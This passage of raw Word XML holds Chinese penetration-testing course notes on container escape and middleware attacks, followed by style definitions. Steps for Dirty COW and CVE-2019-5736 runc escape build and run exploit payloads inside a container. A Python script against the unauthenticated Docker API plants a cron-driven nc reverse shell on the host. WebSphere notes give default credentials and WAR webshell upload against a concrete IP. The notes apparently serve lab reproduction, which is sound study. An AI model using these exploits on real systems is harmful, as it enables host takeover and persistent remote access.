                        <w:pPr>
                          <w:pStyle w:val="oth9xn"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t># 编译并运行POC</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="oth9xn"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t xml:space="preserve">cd /dirtycow-vdso/  </w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="oth9xn"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t xml:space="preserve">make      </w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="oth9xn"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t xml:space="preserve">./0xdeadbeef   </w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="oth9xn"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>-CVE-2019-5736</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="oth9xn"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>参考：https://blog.51cto.com/u_15060465/4336524</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="oth9xn"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>复现：curl https://gist.githubusercontent.com/thinkycx/e2c9090f035d7b09156077903d6afa51/raw -o install.sh &amp;&amp; bash install.sh</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="oth9xn"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>1、下载POC</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="oth9xn"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>git clone https://github.com/Frichetten/CVE-2019-5736-PoC</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="oth9xn"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>2、修改编译生成payload</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="oth9xn"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>CGO_ENABLED=0 GOOS=linux GOARCH=amd64  go build main.go</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="oth9xn"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>3.将该payload拷贝到docker容器中（此时可以模拟攻击者获取了docker容器权限，在容器中上传payload进行docker逃逸） 并执行</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="oth9xn"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>docker cp main ecca872da49d:/home</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="oth9xn"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>docker exec -it ecca872da49d bash</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="oth9xn"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>cd /home/</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="oth9xn"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>chmod 777 main</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="oth9xn"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>./main</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="oth9xn"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>4、再次进入docker镜像后监听即可收到</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="oth9xn"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>docker exec -it 镜像ID bash</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="oth9xn"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>nc -lvvp</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr/>
                          <w:t>3、容器安全漏洞</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>docker未授权访问漏洞-vulhub-exp.py</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>import docker</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>client = docker.DockerClient(base_url='http://目标IP:2375/')</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc 反弹IP 端口 -e /bin/sh' &gt;&gt; /tmp/etc/crontabs/root" ''', remove=True, volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw'}})</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>#中间件-WebSphere-搜哈</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>WebSphere® Application Server 加速交付新应用程序和服务，它可以通过快速交付创新的应用程序来帮助企业提供丰富的用户体验从基于开放标准的丰 富的编程模型中进行选择，以便更好地协调项目需求与编程模型功能和开发人员技能。</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>端口：9080—web(http)应用访问端口、9443—web(https)应用访问端口、9060—管理后台访问端口、9043—管理控制台安全端口、8880—SOAP连接器端口等等。</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>漏洞探测在8880端口，后台是9060端口，解析是9080端口</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>拉取镜像：docker pull iscrosales/websphere7</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>启动镜像：docker run -d -p 9060:9060 -p 9043:9043 -p 8880:8880 -p 9080:9080 iscrosales/websphere7</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>停止镜像：docker stop $(docker ps -aq)</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>1、CVE-2015-7450 反序列化</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>工具搜哈：http://47.94.236.117:8880/</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>2、弱口令 上传拿Shell</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>-在6.x至7.0版本，后台登陆只需要输入admin作为用户标识，无需密码，即可登陆后台。</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>-websphere/ websphere</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>-system/ manager</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>访问：http://47.94.236.117:9060/</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>登录：admin</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>上传：war马</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>启动：1_war</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="fio6k3"/>
                          <w:rPr/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>连接：http://47.94.236.117:9080/1/1.jsp</w:t>
                        </w:r>
                      </w:p>
                      <w:p>
                        <w:pPr>
                          <w:pStyle w:val="tjw08u"/>
                          <w:rPr>
                            <w:rStyle w:val=""/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rStyle w:val="c2puz6"/>
                          </w:rPr>
                          <w:t>3、CVE-2020-4450：无利用POC/EXP</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </wps:txbx>
                  <wps:bodyPr anchorCtr="false" forceAA="false" rtlCol="false" anchor="t" vertOverflow="overflow" wrap="square" spcFirstLastPara="false" compatLnSpc="true" horzOverflow="overflow" rIns="114300" lIns="400050" spcCol="0" numCol="1" rot="0" tIns="114300" fromWordArt="false" vert="horz" bIns="114300">
                    <a:prstTxWarp prst="textNoShape">
                      <a:avLst/>
                    </a:prstTxWarp>
                    <a:spAutoFit/>
                  </wps:bodyPr>
                </wps:wsp>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val=""/>
        <w:numPr/>
        <w:pBdr>
          <w:bottom w:sz="8" w:color="050301" w:val="thinThickThinSmallGap"/>
        </w:pBdr>
        <w:rPr>
          <w:rStyle w:val=""/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:shd w:fill="FFFF00" w:color="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val=""/>
        <w:numPr/>
        <w:rPr>
          <w:rStyle w:val=""/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:shd w:fill="FFFF00" w:color="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val=""/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:shd w:fill="FFFF00" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>涉及资源：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val=""/>
        <w:numPr/>
        <w:pBdr>
          <w:bottom w:sz="8" w:color="030102" w:val="thinThickThinSmallGap"/>
        </w:pBdr>
        <w:rPr>
          <w:rStyle w:val=""/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:shd w:fill="FFFF00" w:color="auto" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val=""/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val=""/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:instrText xml:space="preserve">HYPERLINK https://docs.qq.com/doc/DQ3Z6RkNpaUtMcEFr docLink \tdfn %u8865%u5145%uFF1A%u6D89%u53CA%u5F55%u50CF%u8BFE%u4EF6%u8D44%u6E90%u8F6F%u4EF6%u5305%u8D44%u6599%u7B49%u4E0B%u8F7D%u5730%u5740 \tdfu https://docs.qq.com/doc/DQ3Z6RkNpaUtMcEFr \tdfe 0 </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val=""/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k8m4nv"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>补充：涉及录像课件资源软件包资料等下载地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val=""/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:pgSz w:h="16838" w:w="11905"/>
      <w:pgMar w:bottom="1361" w:right="1417" w:left="1417" w:top="1361"/>
    </w:sectPr>
  </w:body>
</w:document>
</file>

<file path=word/fontTable.xml><?xml version="1.0" encoding="utf-8"?>
<w:fonts xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
  <w:font w:name="Times New Roman">
    <w:panose1 w:val="02020603050405020304"/>
    <w:charset w:characterSet="ISO-8859-1" w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
    <w:sig w:csb1="00000000" w:csb0="000001FF" w:usb3="00000000" w:usb0="E0002EFF" w:usb1="C000785B" w:usb2="00000009"/>
  </w:font>
  <w:font w:name="等线 Light">
    <w:panose1 w:val="02010600030101010101"/>
    <w:charset w:characterSet="ISO-8859-1" w:val="86"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
    <w:sig w:csb1="00000000" w:csb0="0004000F" w:usb3="00000000" w:usb0="A00002BF" w:usb1="38CF7CFA" w:usb2="00000016"/>
  </w:font>
  <w:font w:name="DengXian">
    <w:altName w:val="等线"/>
    <w:panose1 w:val="02010600030101010101"/>
    <w:charset w:characterSet="ISO-8859-1" w:val="86"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
    <w:sig w:csb1="00000000" w:csb0="0004000F" w:usb3="00000000" w:usb0="A00002BF" w:usb1="38CF7CFA" w:usb2="00000016"/>
  </w:font>
</w:fonts>
</file>

<file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
<w:numbering xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
  <w:abstractNum w:abstractNumId="0">
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:pPr>
        <w:ind w:hanging="336" w:left="2536"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="wingdings" w:hint="default" w:ascii="wingdings" w:hAnsi="wingdings" w:eastAsia="wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="¡"/>
      <w:pPr>
        <w:ind w:hanging="336" w:left="3416"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="wingdings" w:hint="default" w:ascii="wingdings" w:hAnsi="wingdings" w:eastAsia="wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:pPr>
        <w:ind w:hanging="336" w:left="1656"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="wingdings" w:hint="default" w:ascii="wingdings" w:hAnsi="wingdings" w:eastAsia="wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:pPr>
        <w:ind w:hanging="336" w:left="2976"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="wingdings" w:hint="default" w:ascii="wingdings" w:hAnsi="wingdings" w:eastAsia="wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="¡"/>
      <w:pPr>
        <w:ind w:hanging="336" w:left="2096"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="wingdings" w:hint="default" w:ascii="wingdings" w:hAnsi="wingdings" w:eastAsia="wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:hanging="336" w:left="336"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="wingdings" w:hint="default" w:ascii="wingdings" w:hAnsi="wingdings" w:eastAsia="wingdings"/>
        <w:u/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="¡"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:hanging="336" w:left="776"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="wingdings" w:hint="default" w:ascii="wingdings" w:hAnsi="wingdings" w:eastAsia="wingdings"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:hanging="336" w:left="1216"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:cs="wingdings" w:hint="default" w:ascii="wingdings" w:hAnsi="wingdings" w:eastAsia="wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1">
    <w:abstractNumId w:val="0"/>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15" w:uri="http://schemas.microsoft.com/office/word" w:name="compatibilityMode"/>
    <w:compatSetting w:val="1" w:uri="http://schemas.microsoft.com/office/word" w:name="differentiateMultirowTableHeaders"/>
    <w:compatSetting w:val="1" w:uri="http://schemas.microsoft.com/office/word" w:name="enableOpenTypeFeatures"/>
    <w:compatSetting w:val="0" w:uri="http://schemas.microsoft.com/office/word" w:name="useWord2013TrackBottomHyphenation"/>
    <w:compatSetting w:val="1" w:uri="http://schemas.microsoft.com/office/word" w:name="doNotFlipMirrorIndents"/>
    <w:compatSetting w:val="1" w:uri="http://schemas.microsoft.com/office/word" w:name="overrideTableStyleFontSizeAndJustification"/>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iPriority="62" w:name="Light Grid"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="HTML Definition"/>
    <w:lsdException w:uiPriority="48" w:name="List Table 3 Accent 5"/>
    <w:lsdException w:uiPriority="63" w:name="Medium Shading 1 Accent 2"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="List Number 2"/>
    <w:lsdException w:uiPriority="65" w:name="Medium List 1 Accent 5"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Body Text Indent"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Columns 3"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Classic 1"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="page number"/>
    <w:lsdException w:uiPriority="47" w:name="List Table 2 Accent 5"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="HTML Preformatted"/>
    <w:lsdException w:uiPriority="49" w:name="Grid Table 4"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Subtle 1"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:uiPriority="39" w:name="toc 5"/>
    <w:lsdException w:uiPriority="51" w:name="List Table 6 Colorful Accent 6"/>
    <w:lsdException w:uiPriority="69" w:name="Medium Grid 3 Accent 3"/>
    <w:lsdException w:name="heading 7" w:qFormat="true" w:uiPriority="9" w:semiHidden="true" w:unhideWhenUsed="true"/>
    <w:lsdException w:uiPriority="52" w:name="List Table 7 Colorful Accent 2"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Grid 7"/>
    <w:lsdException w:qFormat="true" w:uiPriority="29" w:name="Quote"/>
    <w:lsdException w:uiPriority="50" w:name="List Table 5 Dark Accent 2"/>
    <w:lsdException w:semiHidden="true" w:name="Revision"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="endnote text"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="HTML Typewriter"/>
    <w:lsdException w:uiPriority="60" w:name="Light Shading Accent 4"/>
    <w:lsdException w:uiPriority="49" w:name="List Table 4 Accent 4"/>
    <w:lsdException w:uiPriority="48" w:name="Grid Table 3 Accent 3"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="List Bullet 3"/>
    <w:lsdException w:uiPriority="68" w:name="Medium Grid 2 Accent 5"/>
    <w:lsdException w:uiPriority="61" w:name="Light List"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Colorful 3"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:uiPriority="39" w:name="toc 7"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Salutation"/>
    <w:lsdException w:uiPriority="62" w:name="Light Grid Accent 1"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="HTML Top of Form"/>
    <w:lsdException w:name="heading 3" w:qFormat="true" w:uiPriority="9" w:semiHidden="true" w:unhideWhenUsed="true"/>
    <w:lsdException w:uiPriority="42" w:name="Plain Table 2"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="HTML Bottom of Form"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Subtle 2"/>
    <w:lsdException w:uiPriority="72" w:name="Colorful List Accent 1"/>
    <w:lsdException w:uiPriority="61" w:name="Light List Accent 3"/>
    <w:lsdException w:uiPriority="70" w:name="Dark List Accent 4"/>
    <w:lsdException w:uiPriority="49" w:name="List Table 4"/>
    <w:lsdException w:uiPriority="64" w:name="Medium Shading 2 Accent 3"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Body Text First Indent"/>
    <w:lsdException w:qFormat="true" w:uiPriority="10" w:name="Title"/>
    <w:lsdException w:uiPriority="66" w:name="Medium List 2 Accent 4"/>
    <w:lsdException w:uiPriority="73" w:name="Colorful Grid Accent 4"/>
    <w:lsdException w:uiPriority="39" w:name="Table Grid"/>
    <w:lsdException w:uiPriority="47" w:name="List Table 2 Accent 4"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Professional"/>
    <w:lsdException w:uiPriority="72" w:name="Colorful List Accent 6"/>
    <w:lsdException w:uiPriority="63" w:name="Medium Shading 1"/>
    <w:lsdException w:uiPriority="68" w:name="Medium Grid 2 Accent 1"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Body Text Indent 2"/>
    <w:lsdException w:uiPriority="67" w:name="Medium Grid 1"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="index 6"/>
    <w:lsdException w:uiPriority="63" w:name="Medium Shading 1 Accent 6"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Table Web 3"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="List Bullet"/>
    <w:lsdException w:uiPriority="72" w:name="Colorful List Accent 2"/>
    <w:lsdException w:uiPriority="70" w:name="Dark List"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="List Number 5"/>
    <w:lsdException w:uiPriority="63" w:name="Medium Shading 1 Accent 5"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="table of authorities"/>
    <w:lsdException w:uiPriority="46" w:name="List Table 1 Light Accent 6"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="envelope return"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="HTML Address"/>
    <w:lsdException w:uiPriority="70" w:name="Dark List Accent 1"/>
    <w:lsdException w:uiPriority="46" w:name="List Table 1 Light"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="Plain Text"/>
    <w:lsdException w:unhideWhenUsed="true" w:semiHidden="true" w:name="List 2"/>
    <w:lsdException w:uiPriority="50" w:name="List Table 5 Dark Accent 3"/>
